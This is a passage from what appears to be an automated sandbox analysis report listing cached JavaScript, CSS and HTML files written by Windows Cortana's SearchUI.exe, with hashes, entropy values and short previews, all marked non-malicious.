                      SHA-512:2E668EA89C8F8BD15F0418EFE698F2EE49C16C61CF145EAB1978FDE94873E70DF28322172D2FE576514AF822193FE7155E209170FA247D3D1E16752F20B0A055
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\HkpLvsXkCMkluzD--i9_Hl9v67o[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):94820
                      Entropy (8bit):5.395085534401416
                      Encrypted:false
                      SSDEEP:1536:pSiK8U0NfNWx/mrV+vR1f1fyaSDUQsdObzFcFFUHZy:FV+rf1DQdRcDqy
                      MD5:95029A2B8ED04C57F44599682E9CE9C6
                      SHA1:1E4A4BBEC5E408C925BB30FEFA2F7F1E5F6FEBBA
                      SHA-256:15EDF8C630F285A9B9D9033D867F4FB1D5288AD3BE707F31FB3BF7EDFA54EAEA
                      SHA-512:3C1F3EAA0E2D26D8CF854714E4BA4AF36B102D7AA8CE4138734406BABCD54DC3002EE31A3540009EA7E2C8C8DC3C8CB2CE6E753F410E6C3A0EF055A1E362A608
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Icb6UCeA0jjc7b0P0da2Jax9Xyw.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):58510
                      Entropy (8bit):5.423191599446094
                      Encrypted:false
                      SSDEEP:1536:UpvOFMkemvRKLVGJknUYv2qaNAhLnadaZBI3vJGsn89+B:UdOF8nUFV8E
                      MD5:15CEE24266CD6FF1C4DB782AE2E1DEA9
                      SHA1:D5F16B4538B5651B04053B0F36C63E7F7BF837DA
                      SHA-256:C06A74F7D319725CC5DE5AD6A5C5268F106A3557209479C57EA24F416A4918A3
                      SHA-512:66485B4EAA5F577E410614C18F9CEAEB5342F3F855B14035CE0831D8505D62E8A40A854676F27145643C78A19AE776850CD921A9DA29ACB90E22F33F04C4DA29
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Init[1].htm
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                      Category:dropped
                      Size (bytes):323384
                      Entropy (8bit):5.926733097648016
                      Encrypted:false
                      SSDEEP:6144:qpHTE7ummQ+pF6L1DDdsWUzchrtOfAZbDA8as:fum3pZhUzK0ibJas
                      MD5:C0C6B006DA48ED7B9965BC20353E85B4
                      SHA1:5D857576980AD30F9BDFEC767BDE1CE2A6699386
                      SHA-256:21348CE3BF312416465B407356D1A2B81A9A8208ED7218366101AEE024B708F6
                      SHA-512:03C462F998470E1A9544DF90BE47E96A82A74E4442BDBC801E7AE3A2F02CB42644E1DC6CDD70DBA49F8F4BE8F92189A941C2AA2919EE631E1EF343E0672C7F0D
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\J2ICnXp7GMPdq7wY6PnNtCSY5vE.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):62538
                      Entropy (8bit):5.162532697272359
                      Encrypted:false
                      SSDEEP:768:gduBggnd/KAcLY7E++ZcHZUQ5j/p0AL/uTYMHJo1TeOUXh1x/g7Zg+G9QgzyHM:gzZKZhMyT+XEG9Pzys
                      MD5:2CA46CFFB3D3E4867A4E8A8231850069
                      SHA1:23C600F9AEE7F2E1438873EA0167E56E36AC80A3
                      SHA-256:B1597FC6B6FCD43C22BB82791242484A5D08221AA89342207A759CC5756F9CE6
                      SHA-512:E6ED31F0C9BA8AE6391FD6E9948E7797CE86BC2313B1A5D576D0C27901D6D87D827BBACD5CB902D671AD54EE295F9B78BFF3725E8E0E4B644D4E3BF85D660101
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\KDRu5rg-u7qGr4nBIMZzQly6R_0.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):2294
                      Entropy (8bit):4.994755284370797
                      Encrypted:false
                      SSDEEP:48:uj4b+YGuvVADSRR4J1UjQkWWWtJt0RE5hTL4JXhXjMpXvXYk:UJmvuDevWgggh45/Yk
                      MD5:A5CC9DCC23B92296E3BA09D1640698AA
                      SHA1:5E2107B6B9CA65968025B1BE9A2D44D779145A38
                      SHA-256:21EF4AB9E3E454978FA76AF95DC27FD10752F54DD4E9F1B576B6DE7CC2F856DC
                      SHA-512:AB226B03A1681453264F366966F9CCAC45F621B6A6E23194B23ED803177A68923DAA441F6C154F74FCAD4F9A047A7AFCBB0CB65CA45A1CB5B8713C250D2E13B4
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\KzBYfgPMceHbs4NiWkwYLok4Avs.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):61793
                      Entropy (8bit):5.208365454293023
                      Encrypted:false
                      SSDEEP:1536:6NK8rSkBl5VoGDskZDWrT11qscjLkZLWJ/4+wVNe0WkFTaJeDRWG9ZYgn1D4n8z:aK8rZkK54+nE1WG9ZYwz
                      MD5:2409843C998578D89079D89499F35058
                      SHA1:F6CEB468379A4F5C800317D1A8CD5D534C70F9B1
                      SHA-256:B15CDB95909C50CB015F402B171BBD8DE4CAFDD30E3D8A567E2FA27AC37D18CB
                      SHA-512:D9C2B8CF9939B893B3552D4DB1063795A0999039E53C70F2877388FA9BA94B99057B035F2714F9CFD7B464031B6B23779061ACB40C12EF324B116B8502C02682
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\MAi8ZrMgFhG81tZ07Arc2JEjTY8.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines
                      Category:dropped
                      Size (bytes):121212
                      Entropy (8bit):5.344643522973541
                      Encrypted:false
                      SSDEEP:1536:ESf3xYtOXu2ty+gtaZ2GSqKndpOgVnCBO1cChj1L3y99LS:E8x9XuUtgtaZ2pn/OO1Um
                      MD5:2672A6253AB5F7C90F6E240A39FD777A
                      SHA1:B5163F2CB4498C82421D53B7F48905BDAD5F0F9A
                      SHA-256:512350055C0ED6D4E35E726648653FAD41DEEEC3D98194947948B7307FC0CFBB
                      SHA-512:EC012932EF31BB57991B69E0C021781B57BA349771C737CF5EBAE925C246A4910D06581DC286C1D366D0F10EC9CE76E8A6DFCF86DEB1C0EE73F879C26ADBA7E9
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\N7CkZwDnglE0ohhGTecIK8uW1Yg.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:exported SGML document, UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):205394
                      Entropy (8bit):5.316121311921703
                      Encrypted:false
                      SSDEEP:3072:drS49xxDxpFEVP8wGNjr9247Sn+LD/ZJayKQ/DNlybrSdOxmBDmB4I:5S49x9Sl+BmbrSdAmBDmB4I
                      MD5:58E42C78BF715A4F9D3FBEBB70C80145
                      SHA1:4A091565B47C3946763BEFFC3677C15B94DEF436
                      SHA-256:7D9600997E01D7B3E5AF7FE2419FBBC34BF0609A8DD4592BE663D202215DAF56
                      SHA-512:24884F6D8FF201AB2C648DEFFC8D8302252FDFB0CDC725185E3E4BD9095DD25331883BEC1BA0F172BC7D98FBD9F95B04061336933D9B931B6699817EBA82D68A
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):6
                      Entropy (8bit):2.584962500721156
                      Encrypted:false
                      SSDEEP:3:jUYn:jBn
                      MD5:77373397A17BD1987DFCA2E68D022ECF
                      SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
                      SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                      SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                      Malicious:false
                      Preview: z{a:1}
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):17560
                      Entropy (8bit):5.4266165365013235
                      Encrypted:false
                      SSDEEP:384:iTKwROpIbfMP+t4JdQFBfMlArU/HW8o/Z0Co/lo1LqEzubSfpj:wKwnfMP+EdQFBfMiA/2jR0n6wuj
                      MD5:C8BE2C675D49A0D03AB4965A3AD5E9EF
                      SHA1:500ADA3E4B4A975D296D2049D53BBE7095F6FA77
                      SHA-256:DEBEDE07EF020FEFCA20294F5C16FA8D5FCDEC4DE0355BCA446F3B93D219B687
                      SHA-512:F7BBC3C6C35554193A292BA32E52E740F35D286E63C0805E5C8BCEDA84399D3D7081531CFF407D31B050DBB454571E0A3752A18863E311B18841209F30986517
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\YFRiFdAq8JMFRbEqynlPcrVqvb4[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):1524
                      Entropy (8bit):5.113989659252064
                      Encrypted:false
                      SSDEEP:24:FhMzkuYmRdyVYu8nVHcJDDOXOI6bslnTUGqqJlnCM:3Mr1RdyVvUgDQFTkCJ
                      MD5:274B4E069C08C8B319F54D8A26F2C3CA
                      SHA1:FB49944AC40D01ADC34D7D86498C5FEBB5D77D32
                      SHA-256:9007244EF551F42176E17D4172C1C4FFF1D35E362C83631E13E83FFBDB4E96B3
                      SHA-512:451C688F04304E7D04725D92ADF6DBE9A61E132110824A61C5B11A4B840520006D94BA2A682D38B88BC0B20F56769733255ACF87431CFB26ED6CC7DFB78DAB4B
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):45447
                      Entropy (8bit):4.519302585237155
                      Encrypted:false
                      SSDEEP:768:J0IPAyG9+tOMwFqTWbHUSiuAwmvqWf/LyZsXoUklYv/er/r3OwYEFGH0RhB78Wb+:J0IPX3f+Dglat5kmtW
                      MD5:6859B06C69A93BD325D6CDB2A5CECBD4
                      SHA1:5F1B96C6E59054C14D1EE9A3F3A2CBBC70E03B87
                      SHA-256:6A232348034A0564B74D8A293AC8DC15664E26664CD4E071E1D2E740B76D9EC6
                      SHA-512:9166D92CBF6945282259A2CA8D53F6D5986FF81DE3D61C191D44A745B093936E21E71132833CB885A829C9BF9E4CE42618BD5E995B7A24929436615DF35E91ED
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):20407
                      Entropy (8bit):5.305440084477046
                      Encrypted:false
                      SSDEEP:384:Kncvz0mcLDICWE8RtoW0W6jYRmUo0YZA9kE:BLo0CWE8RzQUcA9B
                      MD5:DBA3A107C2F712A09965545FB5C09FAF
                      SHA1:381751A93F9C12887AC67E50BDDF748D7AB99206
                      SHA-256:9E0E1DFB8EA8D029C69BCAD4CEDC7D8981FAF9E2C915616FB740F2EEFDCD30EE
                      SHA-512:B1FA5EB1AF33900488910DCAB2FD450A88810C50CF1C9DFF2ADFE5A514F9449B4D06A667FD010347B6D0B88B88EB7765A929D893E5ADE8F83AE3FD4FE1EB1F3A
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\jz5JHWe_2WCod7u1RNWmByRezL4.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):8204
                      Entropy (8bit):5.24502306901906
                      Encrypted:false
                      SSDEEP:192:jTceevz/oCfPJQhDEWaMLccp+pZNpPpGIp6/rktQeH+t0B6LB+T1k:jTceevzlrDkmVRn6jk2OB6V+T1k
                      MD5:E9E0F2C7D9FF4E7BA872A004593454B5
                      SHA1:2DB69A5F85D5AFD2C523F8F6B8867EAA4E1125F9
                      SHA-256:24D847FBF4FD59BE3529FDFA7542FD3FE9512662927DD482E60D11344175E778
                      SHA-512:F01AC1FED499AAB6465F3F1FEA96B5036043C260DD8A9029046895768794503264A98E41CC306F54557EAC74C228AF9A65A1E6CBDCFE6B4E0E8BBBD730F6A6A5
                      Malicious:false
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\lSzONrEv32rFv3DQRdlSkoDGGY0.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):103802
                      Entropy (8bit):6.294860966135571
                      Encrypted:false
                      SSDEEP:1536:Khk1qk7tqk7JRGgK+XoHHCtVH45saoLwl3TQesqbjDiMhByt/Gk7bbFZjwzVCU:rL8HCtVHdLwqsiyBCPmCU
                      MD5:4E20ABD287CF6AE15999E19C0576124C
                      SHA1:D07CC599F89272C12C47B6F84C83C9F4CB8BBF61
                      SHA-256:886B00A6FF472267A085E5802210A2E6DA9CD5E92ACD3DDCB3EBFF89574B8054
                      SHA-512:24BB2C128545B8C0A298F6A90FFA61D1C5A38E4B6CC2483A6BBD9E1B184E40BF12A10D4C42A4842FE863B680739A56AD237775C123C8964ACB3DE8C63CA519FA
                      Malicious:false
                      Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"LocStrings",namespace:"Feedback"},{DIALOG_ALIAS_ERROR_TEXT:t[0],DIALOG_ALIAS_LABEL:t[1],DIALOG_ALIAS_TEXT:t[2],DIALOG_ASK_FEEDBACK:t[3],DIALOG_CANCEL_BUTTON_TEXT:t[4],DIALOG_COMMENT_ERROR_TEXT:t[5],DIALOG_COMMENT_LABEL:t[6],DIALOG_COMMENT_TYPE_LABEL:t[7],DIALOG_COMMENT_TYPE1:t[8],DIALOG_COMMENT_TYPE2:t[9],DIALOG_COMMENT_TYPE3:t[10],DIALOG_COMMENT_TYPE4:t[11],DIALOG_COMMENT_TYPE5:t[12],DIALOG_COMMENT_TYPE6:t[13],DIALOG_INCLUDE_SCREENSHOT:t[14],DIALOG_MSFT_INTERNAL:t[15],DIALOG_PRIVACY_POLICY:t[16],DIALOG_SEND_BUTTON_TEXT:t[17],DIALOG_SEND_EMAIL_LABEL:t[18],LEARN_MORE_LINK_TEXT:t[19],PRIVACY_STATEMENT_LINK_TEXT:t[20],REPORT_LEGAL_OR_PRIVACY_CONCERN:t[21],WINDOWS_DIALOG_COMMENT_TEXT:t[22],WINDOWS_TITLE_TEXT:t[23]}),i}return i(n,t)})("af",["Voer asseblief jou alias in.","en cc my by","Voer jou alias hier in.","Het jy enige spesifieke terugvoer?","Kanselleer","Laat 'n kommentaar asseblief.","Teksvenster vir j
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\nEl6gm6izUrrDobE23TevZhe_fI[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):66986
                      Entropy (8bit):6.002532652367151
                      Encrypted:false
                      SSDEEP:1536:Rk0h26JqMsJrdUPBERLxAMP7a5zjEMQBNRDIu/QAwape4:Rlv1sLRMz43BNFB
                      MD5:4D3E595F2CBC3A17F1AF84725C46E751
                      SHA1:0825FFDBABA1A76BD3291A01E0BC37DC0287FCA5
                      SHA-256:3CBDCF1C0B5C56F239D334AA89251B0D0398E4C36F0490435097E02CF5BC7EB9
                      SHA-512:93B570A293843B3ABEAB8C8CC73B3B9F8B66B68E5A31F28854A6F0EDE70D1F7FE3E1821D484420F694AF280EEB7EE7B84C24DAAFE1F1FEEBA503D238204CBB51
                      Malicious:false
                      Preview: @font-face{font-family:"Cortana MDL2 Assets";src:url(data:application/font-woff;base64,
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\p_H40Ndq102p2Socno0_V88cqhw[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):8313
                      Entropy (8bit):6.052018977754187
                      Encrypted:false
                      SSDEEP:192:9Acfyf9Kn8i/kzSRS7cb8xM/Qbs3CyzSz/Wp:Wcfyf9K8i/kzSRycbdQbsWLWp
                      MD5:ABF5B9B940857FBD14B60DEA87CCB55F
                      SHA1:8A8AA1FF59E26E1C9E5137269630CA25DA231F3E
                      SHA-256:402598AD8D9469816D4AA4E7DF4957B8A01AC03BF09A9AFED279E45777B046C8
                      SHA-512:F3B556775EF65D0836E3B593867DA0194F0D2E67F78CFEFF99218851466A7F7E6364369194735FFDC22021175A8959B05F71F959D968897812DDB1EAB5FACE0A
                      Malicious:false
                      Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"MicrosoftSearch",namespace:"WindowsSearchBox"},{MsbPeopleContacts:t[0],MsbPeopleGroups:t[1],MsbReverifyAccount:t[2],MsbVerifyAccount:t[3]}),i}return i(n,t)})("ar",[".... .......",".........",".... .. ..... ..... .. ....... ..... .. {0}",".... .. ..... ..... .. ....... ....."])("bg",["........",".....",".......... ....... .., .. .. ....... .......... .. ........ .. .. {0}",".......... ....... .. .. ....... . ......... .........."])("ca",["Contactes","Grups","Verifiqueu el compte per cercar informaci. de la feina des de {0}","Verifiqueu el compte per cercar informaci. de la feina"])("cs",["Kontakty","Skupiny","Chcete-li vyhledat pracovn. informace z adresy {0}, ov..te sv.j ..et","Chcete-li vyhledat pracov
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\pdDKwBCexH8cKQFyK4LcJkh-gFc[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):15982
                      Entropy (8bit):5.276709297927942
                      Encrypted:false
                      SSDEEP:384:OiD8Rj/n+B3VRAATV7/ClGAbyI4PLOEfDE:dD4q1TV7/ClGAbyI4PLOEQ
                      MD5:9A082EADBD1B7FBA36DBF3EBFABC9481
                      SHA1:0450300D6CAF3A442FCD9E96F01AAF9BFDF1499A
                      SHA-256:3CA375F13414EC46DA069933CEE2D1693F0A874B6994CB4A38C34B9C01BA24CA
                      SHA-512:9AAB0EBB375F28F716521B9F6ABA8F0116AAC2BC4730AF1E849D5D7E959D59A4F67445A23A05D207782B799C88967971EDA493F97CB7D836609A4EAAA3D4491F
                      Malicious:false
                      Preview: html{-ms-user-select:none;overflow-y:hidden;overflow-x:hidden;cursor:default}body[dir] table,body[dir] td{margin:0;padding:0}body{font-size:15px;line-height:20px;font-family:"Segoe UI",Arial,Helvetica,Sans-Serif;color:#000}body[dir]{margin:0}body .tallUx{font-size:13px}#root{overflow:hidden}.absoluteForMeasuring{position:absolute;width:1000px}.groupHeader{display:flex;color:rgba(0,0,0,.6);font-size:13px;line-height:17px}body[dir] .groupHeader{padding:8px 12px}body[dir] .rs5UX .groupHeader{padding:8px 8px}.b_secondaryFocus{font-size:15px;line-height:20px}body[dir] .b_secondaryFocus{padding-bottom:0}.simpleContainer{display:flex}body[dir] .simpleContainer{padding:8px 12px}body[dir='ltr'] .rs5UX .suggestion .simpleContainer{padding-left:8px;padding-right:8px}body[dir='rtl'] .rs5UX .suggestion .simpleContainer{padding-right:8px;padding-left:8px}.detailVerticalBox{display:flex;flex-direction:column;flex:1;overflow:hidden}.suggestion.rich .richContainer{top:-132px}.richContainer{position:rel
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\xHnNQ3wW6s9nBB6qzyP9T8jw4bY[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):258178
                      Entropy (8bit):5.366121248495626
                      Encrypted:false
                      SSDEEP:6144:5NHCYqdoQG/Fau5PSB8J/8Wfj00mGdUMWsrIud:/NFauR5mQ
                      MD5:3E213BC387DB9E197F5163BF6CA2F721
                      SHA1:01491CF86180CD7501FAD911534D8A0E6968C2D3
                      SHA-256:066069DB265B55B9760C443974E5E0EB168076C0EFB3225900E50D167D41DDD8
                      SHA-512:70C6510FF0AB9140DE64C6CA8141743FA925F285825954BF47627A5CF8065A4F89E9B34DDA34500E864721B59EA784133452EA2474411A1D6B6DBCB9EBEE7FC4
                      Malicious:false
                      Preview: var __spreadArrays,WSB;(function(n){function t(){if(SearchAppWrapper.CortanaApp.hostingEnvironment==4)return 7;if(!n.isMiniSerpEnabled())return 0;var t=7;return n.config.allowAnswersToAutoOpenMiniSerp||(t&=-2),n.config.allowDNavToAutoOpenMiniSerp||(t&=-3),n.config.allowWebToAutoOpenMiniSerp||(t&=-5),t}var i=["::{679F85CB-0220-4080-B29B-5540CC05AAB6}","::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"],r=function(){function r(){this.refreshEntrypointApp()}return r.prototype.refreshEntrypointApp=function(){this.EntryPointApp=SearchAppWrapper.CortanaApp.hostingEnvironment==3?1:n.config.forceSettingsAppExperience?3:SearchAppWrapper.CortanaApp.hostingEnvironment==5||n.config.forceSantoriniExperience?4:SearchAppWrapper.CortanaApp.hostingEnvironment==4?2:0},r.prototype.clearDefaults=function(){this.QfMode=0;this.PreviewPaneAvailable=!1;this.MiniSERPMode=0;this.AlwaysWide=!1;this.SearchBoxOnTop=!0;this.AllowKeyboardNavCycling=!0;this.AllowKeyboardNavOffCanvas=!1;this.ScopesAvailable=!1;this.FlatListWi
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\z7yiT94xrmnuNX27pgHjE2p6KgQ[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines
                      Category:dropped
                      Size (bytes):52943
                      Entropy (8bit):5.524994109560238
                      Encrypted:false
                      SSDEEP:1536:CMAy8XLTUO88FCSO6wlci0ibiIiHiU/cppI+TS:CFLT3CSO2i0ibiIiHiowTS
                      MD5:31DC2869D3C434A0E875008A833205D9
                      SHA1:340DC706965D273E2C6B4D018B0E86B5F0CDEF6D
                      SHA-256:5BB7C410575176CF4CD40D030CC7DF32460779E39EADA4E34DAE6B5C8D06F911
                      SHA-512:C1A0AEE2B17A8C24DD1942672895B43BADEC17308E0B0249497AF7DA9A781EBFD9CA21C7E97A7FAAFDD325E4E954CE42E6AC8503DF6C3902C6E01B11513B7A45
                      Malicious:false
                      Preview: var __spreadArrays,CoreUtilities,LoggerModule,VisibilityChangeHelperModule,HitHighlightingParserImpl,DataSourceLayoutManager,ThresholdDiagnosticsProd,FailedPromise,ThresholdUtilitiesM2;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){retu
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\zEQqhwKoETyGdQapOnP2uL1FFF0.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):202174
                      Entropy (8bit):4.353086485551748
                      Encrypted:false
                      SSDEEP:1536:nHHWGK3LUfMkjT35OqPrmqsoHh/yKdei6sBpxrjkwT6qt1SgtzjrsisQ1JLgRHX:2V
                      MD5:30F68A3EA9F8FE63101E59CED32FA3E7
                      SHA1:0450964533A5363F20FD7A7AE16821CDFC1FCC1D
                      SHA-256:90FCCF6342D5BCFDE3F69F88B80253EC694B9B901CC55FD84A2E0C6E0FF05CAF
                      SHA-512:F994377757539611FE2781B6AEEDCFE2B2C7073516C0F3887C0FD836E1ED69066DAABE7065DAE1FC4AA071F8F5080939591B3EBD4642B1EAA42C7B25C2003349
                      Malicious:false
                      Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,282)>.3896?t(n,282)>.38961?t(n,267)>.6104?t(n,39)>.0145?t(n,282)>.66669?t(n,38)>7124751?t(n,103)>.99997?.49246:.46311:.42968:.2235:t(n,3)>.03371?.4983:t(n,282)>.62505?t(n,25)>.503?t(n,47)>2.5?.44633:.30993:t(n,38)>223508416?.47784:t(n,269)>4502?t(n,269)>4565?.47772:t(n,284)>1.5?t(n,103)>.99997?.49992:.4902:.4969:.45473:.15382:t(n,267)>.61031?-.49998:.23231:.48906:t(n,0)>.50822?t(n,266)>.00112?-.29242:t(n,41)>.9715?.42523:t(n,41)>.3765?t(n,421)>.71793?t(n,38)>67927560?.44213:.43113:.3727:t(n,24)>.1855?-.031:.35364:t(n,103)>.98373?t(n,421)>.69234?t(n,266)>.00112?-.08047:.41851:t(n,94)>.7673?.4414:t(n,38)>5528556?t(n,94)>.17559?t(n,40)>.1685?.19613:-.26247:-.28885:.21078:t(n,266)>.24569?t(n,1)>.5?t(n,0)>.00477?t(n,266)>.25463?-.43181:t(n,264)>.53942?-.49933:-.27443:t(n,264)>.53942?t(n,266)>.25463?-.46023:-.49705:-.45348:t(n,38)>694628928?t(n,41)>.2425?t(n,267)>.6104?-.441
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\zh8Gb8BdCdZddFgn7wQ6G86Jdok.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):37342
                      Entropy (8bit):5.3267899861839485
                      Encrypted:false
                      SSDEEP:768:7nUURAWwEyypCXv8eBVjsRj838VtmJCG+A21TgXB6jAladSEPTurOiqUVXUiPKG7:D38Ey5jsRIsbmJQA4EXB6jAladSeTuTx
